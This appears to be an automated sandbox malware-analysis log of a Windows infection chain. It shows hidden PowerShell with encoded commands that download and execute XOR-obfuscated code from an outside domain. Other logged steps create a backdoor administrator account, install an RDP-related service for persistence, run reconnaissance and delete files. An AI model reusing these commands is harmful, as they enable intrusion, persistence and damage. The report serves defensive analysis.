Source: powershell.exe, 00000002.00000002.24578851897.0000026223724000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25884234697.000001FA343A8000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.25194511083.0000024F77D61000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe	Process queried: DebugPort

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Temp\svczHost.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Temp\myRdpService.exe	Process token adjusted: Debug
Source: C:\Windows\Temp\myRdpService.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 5520, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoExit -WindowStyle Hidden -NoProfile -ExecutionPolicy bypass -EncodedCommand SQBFAFgAIAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEkAdwByACAAIgBoAHQAdABwADoALwAvAGEAawBhAGQAZQBtAGkAaQBpAGkAaQBpAGkAaQAuAG8AbgBsAGkAbgBlAC8AdAAvAGYAZgA4ADQANQA5ADQAOABlAGUAMgBjAGMAYgBkAGEAMwAzAGEAYQBhAGYAMQAzAGUAYwA4ADcAMwBhADYAMgAyADIANwBjADYAYwBmADQAMQBkAGMAMwBjAGYAYgA0AGQAZABhADAAMABiADcAMQBlADIAYQBlAGYANgA5ADUAMgBlADIAMwBjADUAOABlADUAYQAyADcAOQA3ADQAYgBiADIAMABlAGMAOAAwADIAMQAyADQAYgBlADkAOQBhACIAKQAuAEMAbwBuAHQAZQBuAHQALgBGAG8AcgBFAGEAYwBoACgAewAkAF8AIAAtAGIAeABvAHIAIAAxAH0AKQApACkA

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded IEX ([TExt.EnCOdinG]::UTF8.GetStRING((IWr "https://akademiiiiiiii.online/t/6def67bd58318a59383bb069395b497b13b1ee3bc393b8cf83656c4cd7d23351").COntEnt.FOREacH({$_ -BXoR 1})))
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded IEX ([Text.Encoding]::UTF8.GetString((Iwr "http://akademiiiiiiii.online/t/ff845948ee2ccbda33aaaf13ec873a62227c6cf41dc3cfb4dda00b71e2aef6952e23c58e5a27974bb20ec802124be99a").Content.ForEach({$_ -bxor 1})))
Source: C:\Windows\Temp\svczHost.exe	Process created: Base64 decoded $Username = "User1";$pwd = "123456789!A1a"; $UserParams = @{'Name' = $Username; 'Password' = (ConvertTo-SecureString -String $pwd -AsPlainText -Force); 'PasswordNeverExpires' = $true};New-LocalUser @UserParams;$GroupParams = @{'Group' = 'Administrators'; 'Member' = $Username};Add-LocalGroupMember @GroupParams;
Source: C:\Windows\Temp\svczHost.exe	Process created: Base64 decoded get-service "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.Screen]::AllScreens \| ForEach-Object { "$($_.Bounds.Width)x$($_.Bounds.Height)" } \| Out-File -FilePath "C:\Windows\Temp\dp"
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded IEX ([TExt.EnCOdinG]::UTF8.GetStRING((IWr "https://akademiiiiiiii.online/t/6def67bd58318a59383bb069395b497b13b1ee3bc393b8cf83656c4cd7d23351").COntEnt.FOREacH({$_ -BXoR 1})))	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded IEX ([Text.Encoding]::UTF8.GetString((Iwr "http://akademiiiiiiii.online/t/ff845948ee2ccbda33aaaf13ec873a62227c6cf41dc3cfb4dda00b71e2aef6952e23c58e5a27974bb20ec802124be99a").Content.ForEach({$_ -bxor 1})))	Jump to behavior
Source: C:\Windows\Temp\svczHost.exe	Process created: Base64 decoded $Username = "User1";$pwd = "123456789!A1a"; $UserParams = @{'Name' = $Username; 'Password' = (ConvertTo-SecureString -String $pwd -AsPlainText -Force); 'PasswordNeverExpires' = $true};New-LocalUser @UserParams;$GroupParams = @{'Group' = 'Administrators'; 'Member' = $Username};Add-LocalGroupMember @GroupParams;
Source: C:\Windows\Temp\svczHost.exe	Process created: Base64 decoded get-service "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.Screen]::AllScreens \| ForEach-Object { "$($_.Bounds.Width)x$($_.Bounds.Height)" } \| Out-File -FilePath "C:\Windows\Temp\dp"

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerShElL -WIndowStYLe HIddEn -EnCoDeDCOMmand "SQBFAFgAIAAoAFsAVABFAHgAdAAuAEUAbgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIASQBOAEcAKAAoAEkAVwByACAAIgBoAHQAdABwAHMAOgAvAC8AYQBrAGEAZABlAG0AaQBpAGkAaQBpAGkAaQBpAC4AbwBuAGwAaQBuAGUALwB0AC8ANgBkAGUAZgA2ADcAYgBkADUAOAAzADEAOABhADUAOQAzADgAMwBiAGIAMAA2ADkAMwA5ADUAYgA0ADkANwBiADEAMwBiADEAZQBlADMAYgBjADMAOQAzAGIAOABjAGYAOAAzADYANQA2AGMANABjAGQANwBkADIAMwAzADUAMQAiACkALgBDAE8AbgB0AEUAbgB0AC4ARgBPAFIARQBhAGMASAAoAHsAJABfACAALQBCAFgAbwBSACAAMQB9ACkAKQApAA=="	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -NoExit -WindowStyle Hidden -NoProfile -ExecutionPolicy bypass -EncodedCommand SQBFAFgAIAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEkAdwByACAAIgBoAHQAdABwADoALwAvAGEAawBhAGQAZQBtAGkAaQBpAGkAaQBpAGkAaQAuAG8AbgBsAGkAbgBlAC8AdAAvAGYAZgA4ADQANQA5ADQAOABlAGUAMgBjAGMAYgBkAGEAMwAzAGEAYQBhAGYAMQAzAGUAYwA4ADcAMwBhADYAMgAyADIANwBjADYAYwBmADQAMQBkAGMAMwBjAGYAYgA0AGQAZABhADAAMABiADcAMQBlADIAYQBlAGYANgA5ADUAMgBlADIAMwBjADUAOABlADUAYQAyADcAOQA3ADQAYgBiADIAMABlAGMAOAAwADIAMQAyADQAYgBlADkAOQBhACIAKQAuAEMAbwBuAHQAZQBuAHQALgBGAG8AcgBFAGEAYwBoACgAewAkAF8AIAAtAGIAeABvAHIAIAAxAH0AKQApACkA	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\Detailed information on policy benefits and commission levels for employees after probationary period Storytailors.docx" /o ""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoExit -WindowStyle Hidden -NoProfile -ExecutionPolicy bypass -EncodedCommand SQBFAFgAIAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEkAdwByACAAIgBoAHQAdABwADoALwAvAGEAawBhAGQAZQBtAGkAaQBpAGkAaQBpAGkAaQAuAG8AbgBsAGkAbgBlAC8AdAAvAGYAZgA4ADQANQA5ADQAOABlAGUAMgBjAGMAYgBkAGEAMwAzAGEAYQBhAGYAMQAzAGUAYwA4ADcAMwBhADYAMgAyADIANwBjADYAYwBmADQAMQBkAGMAMwBjAGYAYgA0AGQAZABhADAAMABiADcAMQBlADIAYQBlAGYANgA5ADUAMgBlADIAMwBjADUAOABlADUAYQAyADcAOQA3ADQAYgBiADIAMABlAGMAOAAwADIAMQAyADQAYgBlADkAOQBhACIAKQAuAEMAbwBuAHQAZQBuAHQALgBGAG8AcgBFAGEAYwBoACgAewAkAF8AIAAtAGIAeABvAHIAIAAxAH0AKQApACkA	Jump to behavior
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe nonbo1" start= auto & net start "myRdpService"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe nonbo1" start= auto
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net start "myRdpService"
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\regedit.exe "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "systeminfo \| Select-String \"OS Name\",\"OS Version\";"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\systeminfo.exe "C:\Windows\system32\systeminfo.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=

Source: unknown	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c "start /min "" powershell -windowstyle hidden -encodedcommand "sqbfafgaiaaoafsavabfahgadaauaeuabgbdae8azabpag4arwbdadoaogbvafqarga4ac4arwblahqauwb0afiasqboaecakaaoaekavwbyacaaigboahqadabwahmaogavac8ayqbrageazablag0aaqbpagkaaqbpagkaaqbpac4abwbuagwaaqbuagualwb0ac8angbkaguazga2adcaygbkaduaoaazadeaoabhaduaoqazadgamwbiagiamaa2adkamwa5aduayga0adkanwbiadeamwbiadeazqbladmaygbjadmaoqazagiaoabjagyaoaazadyanqa2agmanabjagqanwbkadiamwazaduamqaiackalgbdae8abgb0aeuabgb0ac4argbpafiarqbhagmasaaoahsajabfacaalqbcafgabwbsacaamqb9ackakqapaa=="" && exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -encodedcommand "sqbfafgaiaaoafsavabfahgadaauaeuabgbdae8azabpag4arwbdadoaogbvafqarga4ac4arwblahqauwb0afiasqboaecakaaoaekavwbyacaaigboahqadabwahmaogavac8ayqbrageazablag0aaqbpagkaaqbpagkaaqbpac4abwbuagwaaqbuagualwb0ac8angbkaguazga2adcaygbkaduaoaazadeaoabhaduaoqazadgamwbiagiamaa2adkamwa5aduayga0adkanwbiadeamwbiadeazqbladmaygbjadmaoqazagiaoabjagyaoaazadyanqa2agmanabjagqanwbkadiamwazaduamqaiackalgbdae8abgb0aeuabgb0ac4argbpafiarqbhagmasaaoahsajabfacaalqbcafgabwbsacaamqb9ackakqapaa=="
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -noexit -windowstyle hidden -noprofile -executionpolicy bypass -encodedcommand sqbfafgaiaaoafsavablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakaaoaekadwbyacaaigboahqadabwadoalwavageaawbhagqazqbtagkaaqbpagkaaqbpagkaaqauag8abgbsagkabgblac8adaavagyazga4adqanqa5adqaoablaguamgbjagmaygbkageamwazageayqbhagyamqazaguaywa4adcamwbhadyamgayadianwbjadyaywbmadqamqbkagmamwbjagyayga0agqazabhadaamabiadcamqbladiayqblagyanga5aduamgbladiamwbjaduaoabladuayqayadcaoqa3adqaygbiadiamablagmaoaawadiamqayadqaygbladkaoqbhaciakqauaemabwbuahqazqbuahqalgbgag8acgbfageaywboacgaewakaf8aiaatagiaeabvahiaiaaxah0akqapacka
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noexit -windowstyle hidden -noprofile -executionpolicy bypass -encodedcommand sqbfafgaiaaoafsavablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakaaoaekadwbyacaaigboahqadabwadoalwavageaawbhagqazqbtagkaaqbpagkaaqbpagkaaqauag8abgbsagkabgblac8adaavagyazga4adqanqa5adqaoablaguamgbjagmaygbkageamwazageayqbhagyamqazaguaywa4adcamwbhadyamgayadianwbjadyaywbmadqamqbkagmamwbjagyayga0agqazabhadaamabiadcamqbladiayqblagyanga5aduamgbladiamwbjaduaoabladuayqayadcaoqa3adqaygbiadiamablagmaoaawadiamqayadqaygbladkaoqbhaciakqauaemabwbuahqazqbuahqalgbgag8acgbfageaywboacgaewakaf8aiaatagiaeabvahiaiaaxah0akqapacka
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand jabvahmazqbyag4ayqbtaguaiaa9acaaigbvahmazqbyadeaiga7acqacab3agqaiaa9acaaigaxadiamwa0aduanga3adgaoqahaeeamqbhaciaowagacqavqbzaguacgbqageacgbhag0acwagad0aiabaahsajwboageabqblaccaiaa9acaajabvahmazqbyag4ayqbtaguaowagaccauabhahmacwb3ag8acgbkaccaiaa9acaakabdag8abgb2aguacgb0afqabwatafmazqbjahuacgblafmadabyagkabgbnacaalqbtahqacgbpag4azwagacqacab3agqaiaataeeacwbqagwayqbpag4avablahgadaagac0argbvahiaywblackaowagaccauabhahmacwb3ag8acgbkae4azqb2aguacgbfahgacabpahiazqbzaccaiaa9acaajab0ahiadqblah0aowboaguadwataewabwbjageababvahmazqbyacaaqabvahmazqbyafaayqbyageabqbzadsajabhahiabwb1ahaauabhahiayqbtahmaiaa9acaaqab7accarwbyag8adqbwaccaiaa9acaajwbbagqabqbpag4aaqbzahqacgbhahqabwbyahmajwa7acaajwbnaguabqbiaguacganacaapqagacqavqbzaguacgbuageabqblah0aowbbagqazaataewabwbjageababhahiabwb1ahaatqblag0aygblahiaiabaaecacgbvahuacabqageacgbhag0acwa7aa0acga=
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\cmd.exe /c powershell.exe -w hidden -nologo -nop -ep bypass -encodedcommand qqbkagqalqbuahkacablacaalqbbahmacwblag0aygbsahkatgbhag0azqagafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwa7acaawwbtahkacwb0aguabqauafcaaqbuagqabwb3ahmalgbgag8acgbtahmalgbtagmacgblaguabgbdadoaogbbagwababtagmacgblaguabgbzacaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsaiaaiacqakaakaf8algbcag8adqbuagqacwauafcaaqbkahqaaaapahgajaaoacqaxwauaeiabwb1ag4azabzac4asablagkazwboahqakqaiacaafqagahwaiabpahuadaataeyaaqbsaguaiaataeyaaqbsaguauabhahqaaaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaxabkahaaiga=
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -encodedcommand qqbkagqalqbuahkacablacaalqbbahmacwblag0aygbsahkatgbhag0azqagafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwa7acaawwbtahkacwb0aguabqauafcaaqbuagqabwb3ahmalgbgag8acgbtahmalgbtagmacgblaguabgbdadoaogbbagwababtagmacgblaguabgbzacaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsaiaaiacqakaakaf8algbcag8adqbuagqacwauafcaaqbkahqaaaapahgajaaoacqaxwauaeiabwb1ag4azabzac4asablagkazwboahqakqaiacaafqagahwaiabpahuadaataeyaaqbsaguaiaataeyaaqbsaguauabhahqaaaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaxabkahaaiga=
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -encodedcommand "sqbfafgaiaaoafsavabfahgadaauaeuabgbdae8azabpag4arwbdadoaogbvafqarga4ac4arwblahqauwb0afiasqboaecakaaoaekavwbyacaaigboahqadabwahmaogavac8ayqbrageazablag0aaqbpagkaaqbpagkaaqbpac4abwbuagwaaqbuagualwb0ac8angbkaguazga2adcaygbkaduaoaazadeaoabhaduaoqazadgamwbiagiamaa2adkamwa5aduayga0adkanwbiadeamwbiadeazqbladmaygbjadmaoqazagiaoabjagyaoaazadyanqa2agmanabjagqanwbkadiamwazaduamqaiackalgbdae8abgb0aeuabgb0ac4argbpafiarqbhagmasaaoahsajabfacaalqbcafgabwbsacaamqb9ackakqapaa=="	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -noexit -windowstyle hidden -noprofile -executionpolicy bypass -encodedcommand sqbfafgaiaaoafsavablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakaaoaekadwbyacaaigboahqadabwadoalwavageaawbhagqazqbtagkaaqbpagkaaqbpagkaaqauag8abgbsagkabgblac8adaavagyazga4adqanqa5adqaoablaguamgbjagmaygbkageamwazageayqbhagyamqazaguaywa4adcamwbhadyamgayadianwbjadyaywbmadqamqbkagmamwbjagyayga0agqazabhadaamabiadcamqbladiayqblagyanga5aduamgbladiamwbjaduaoabladuayqayadcaoqa3adqaygbiadiamablagmaoaawadiamqayadqaygbladkaoqbhaciakqauaemabwbuahqazqbuahqalgbgag8acgbfageaywboacgaewakaf8aiaatagiaeabvahiaiaaxah0akqapacka	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noexit -windowstyle hidden -noprofile -executionpolicy bypass -encodedcommand sqbfafgaiaaoafsavablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakaaoaekadwbyacaaigboahqadabwadoalwavageaawbhagqazqbtagkaaqbpagkaaqbpagkaaqauag8abgbsagkabgblac8adaavagyazga4adqanqa5adqaoablaguamgbjagmaygbkageamwazageayqbhagyamqazaguaywa4adcamwbhadyamgayadianwbjadyaywbmadqamqbkagmamwbjagyayga0agqazabhadaamabiadcamqbladiayqblagyanga5aduamgbladiamwbjaduaoabladuayqayadcaoqa3adqaygbiadiamablagmaoaawadiamqayadqaygbladkaoqbhaciakqauaemabwbuahqazqbuahqalgbgag8acgbfageaywboacgaewakaf8aiaatagiaeabvahiaiaaxah0akqapacka	Jump to behavior
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand jabvahmazqbyag4ayqbtaguaiaa9acaaigbvahmazqbyadeaiga7acqacab3agqaiaa9acaaigaxadiamwa0aduanga3adgaoqahaeeamqbhaciaowagacqavqbzaguacgbqageacgbhag0acwagad0aiabaahsajwboageabqblaccaiaa9acaajabvahmazqbyag4ayqbtaguaowagaccauabhahmacwb3ag8acgbkaccaiaa9acaakabdag8abgb2aguacgb0afqabwatafmazqbjahuacgblafmadabyagkabgbnacaalqbtahqacgbpag4azwagacqacab3agqaiaataeeacwbqagwayqbpag4avablahgadaagac0argbvahiaywblackaowagaccauabhahmacwb3ag8acgbkae4azqb2aguacgbfahgacabpahiazqbzaccaiaa9acaajab0ahiadqblah0aowboaguadwataewabwbjageababvahmazqbyacaaqabvahmazqbyafaayqbyageabqbzadsajabhahiabwb1ahaauabhahiayqbtahmaiaa9acaaqab7accarwbyag8adqbwaccaiaa9acaajwbbagqabqbpag4aaqbzahqacgbhahqabwbyahmajwa7acaajwbnaguabqbiaguacganacaapqagacqavqbzaguacgbuageabqblah0aowbbagqazaataewabwbjageababhahiabwb1ahaatqblag0aygblahiaiabaaecacgbvahuacabqageacgbhag0acwa7aa0acga=
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\cmd.exe /c powershell.exe -w hidden -nologo -nop -ep bypass -encodedcommand qqbkagqalqbuahkacablacaalqbbahmacwblag0aygbsahkatgbhag0azqagafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwa7acaawwbtahkacwb0aguabqauafcaaqbuagqabwb3ahmalgbgag8acgbtahmalgbtagmacgblaguabgbdadoaogbbagwababtagmacgblaguabgbzacaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsaiaaiacqakaakaf8algbcag8adqbuagqacwauafcaaqbkahqaaaapahgajaaoacqaxwauaeiabwb1ag4azabzac4asablagkazwboahqakqaiacaafqagahwaiabpahuadaataeyaaqbsaguaiaataeyaaqbsaguauabhahqaaaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaxabkahaaiga=
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -encodedcommand qqbkagqalqbuahkacablacaalqbbahmacwblag0aygbsahkatgbhag0azqagafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwa7acaawwbtahkacwb0aguabqauafcaaqbuagqabwb3ahmalgbgag8acgbtahmalgbtagmacgblaguabgbdadoaogbbagwababtagmacgblaguabgbzacaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsaiaaiacqakaakaf8algbcag8adqbuagqacwauafcaaqbkahqaaaapahgajaaoacqaxwauaeiabwb1ag4azabzac4asablagkazwboahqakqaiacaafqagahwaiabpahuadaataeyaaqbsaguaiaataeyaaqbsaguauabhahqaaaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaxabkahaaiga=

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
